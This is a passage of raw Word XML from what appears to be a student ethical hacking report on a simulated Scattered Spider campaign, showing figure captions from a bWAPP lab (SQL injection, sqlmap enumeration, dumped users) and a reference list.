              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bWAPP dashboard — logged in</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569B7B5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="1BE6DAA7"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56786F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 11</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573581" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BWAPP_17_sqli_success.png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6AC8761" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Manual SQLi — database returned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3D27532" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="3559CF2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25F0A32" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 12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316C542" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BWAPP_20_sqlmap.png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B9A2515" w14:textId="62D8FBC5" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="002A0D81" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL Map</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 4 databases enumerated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38D78A3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="763254C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16D892D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 13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234540B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BWAPP_22_users_dump.png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891BE3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Users table + cracked passwords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FFB0E7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51CBA39D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50AC7C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF5BA7C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[1]  MITRE Corporation (2024) MITRE ATT&amp;CK Enterprise Matrix. [Online]. Available: https://attack.mitre.org/matrices/enterprise/ [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFEBAF" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[2]  Engebretson, P. (2013) The Basics of Hacking and Penetration Testing. 2nd ed. Waltham, MA: Syngress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43015ABC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[3]  National Vulnerability Database (2011) CVE-2011-2523: vsftpd 2.3.4 Backdoor. [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2011-2523 [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2602C70C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[4]  Microsoft Corporation (2023) Windows Server 2019 Security Baseline. [Online]. Available: https://www.microsoft.com/en-us/download/details.aspx?id=55319 [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AEEA6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[5]  CrowdStrike (2024) 2024 Global Threat Report. [Online]. Available: https://www.crowdstrike.com/global-threat-report/ [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C24798" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[6]  NCSC UK (2023) Multi-Factor Authentication for Online Services. [Online]. Available: https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4184A3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[7]  OWASP Foundation (2021) OWASP Top 10:2021 — A03 Injection. [Online]. Available: https://owasp.org/Top10/A03_2021-Injection/ [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A22C7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[8]  Damele, B. and Stampar, M. (2024) SQLMap v1.10.2. [Online]. Available: https://sqlmap.org/ [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6503A8" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[9]  Al-Shaer, E. and Touili, T. (2021) 'Towards Automated Red Teaming Using MITRE ATT&amp;CK,' Proceedings of IEEE International Conference on Communications and Network Security, pp. 112-119.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A3C4B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[10]  Sharma, P. and Singh, A. (2022) 'A Comprehensive Review of Penetration Testing Methodologies,' IEEE Access, vol. 10, pp. 45231-45248.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7D12D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[11]  Rapid7 (2024) Metasploit Framework v6.4 Documentation. [Online]. Available: https://docs.metasploit.com/ [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59209392" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DA689F" w:rsidRPr="00F870C5">
      <w:headerReference w:type="default" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId2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92903" w14:textId="77777777" w:rsidR="008550D3" w:rsidRDefault="008550D3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="10118762" w14:textId="77777777" w:rsidR="008550D3" w:rsidRDefault="00855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07759" w14:textId="2B1202BD" w:rsidR="00316BC8" w:rsidRDefault="00316BC8">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="1F3864"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:before="1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F1B2B" w14:textId="77777777" w:rsidR="008550D3" w:rsidRDefault="008550D3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6A81F0AD" w14:textId="77777777" w:rsidR="008550D3" w:rsidRDefault="008550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F7F9C" w14:textId="3CC57FE9" w:rsidR="00316BC8" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F3864"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Ethical Hacking</w:t>
    </w:r>
    <w:r w:rsidR="003064E4">
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>— Scattered Spider Campaign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22F5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B76938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3A936E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EC0BBEE"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="568F76FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39DC28EC"/>
    <w:lvl w:ilvl="0" w:tplc="339EBEB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C84E1732">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="363060C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D742B868">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1748845E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8DD24B8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="591E6942">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7AEE98A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EBEC48F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="73F435C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6908C2C"/>
    <w:lvl w:ilvl="0" w:tplc="F656DA38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="26888D06">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B6E02564">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B0344DA6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2E2E0014">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5A1C7B48">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1E761634">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="23AAAFF6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="080046CE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1899364795">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1475680869">
    <w:abstractNumId w:val="3"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="402684452">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="844904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BC8"/>
    <w:rsid w:val="00001946"/>
    <w:rsid w:val="00014A3C"/>
    <w:rsid w:val="0007604C"/>
    <w:rsid w:val="0016609A"/>
    <w:rsid w:val="001B79E3"/>
    <w:rsid w:val="00277817"/>
    <w:rsid w:val="002A0D81"/>
    <w:rsid w:val="003064E4"/>
    <w:rsid w:val="00316BC8"/>
    <w:rsid w:val="00404ED9"/>
    <w:rsid w:val="00415EF6"/>
    <w:rsid w:val="00427B03"/>
    <w:rsid w:val="004A450F"/>
    <w:rsid w:val="004B32CC"/>
    <w:rsid w:val="004B3831"/>
    <w:rsid w:val="004E1C8E"/>
    <w:rsid w:val="00507DE1"/>
    <w:rsid w:val="00563728"/>
    <w:rsid w:val="005B7F7F"/>
    <w:rsid w:val="005D6E7E"/>
    <w:rsid w:val="005F7F11"/>
    <w:rsid w:val="00605995"/>
    <w:rsid w:val="008443EA"/>
    <w:rsid w:val="008550D3"/>
    <w:rsid w:val="00873A65"/>
    <w:rsid w:val="0088421C"/>
    <w:rsid w:val="009318A8"/>
    <w:rsid w:val="00941583"/>
    <w:rsid w:val="00A04F24"/>
    <w:rsid w:val="00AD5488"/>
    <w:rsid w:val="00AD7F49"/>
    <w:rsid w:val="00AE6741"/>
    <w:rsid w:val="00D131DE"/>
    <w:rsid w:val="00DA689F"/>
    <w:rsid w:val="00DF2546"/>
    <w:rsid w:val="00F67C3B"/>
    <w:rsid w:val="00F870C5"/>
    <w:rsid w:val="00F9299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9A9BB"/>
  <w15:docId w15:val="{DA7D8F67-97A5-472B-AA8F-12333B56E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F3864"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E74B5"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="40404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73A65"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00873A65"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00873A65"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00873A65"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009415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TotalTime>
  <Pages>27</Pages>
  <Words>6292</Words>
  <Characters>35866</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>298</Lines>
  <Paragraphs>84</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>42074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hetvi patel</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-30T13:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-30T18:53:00Z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f7719bd5-3ba2-4cbe-bed0-c30fc2a89eb2</vt:lpwstr>
  </property>
</Properties>
</file>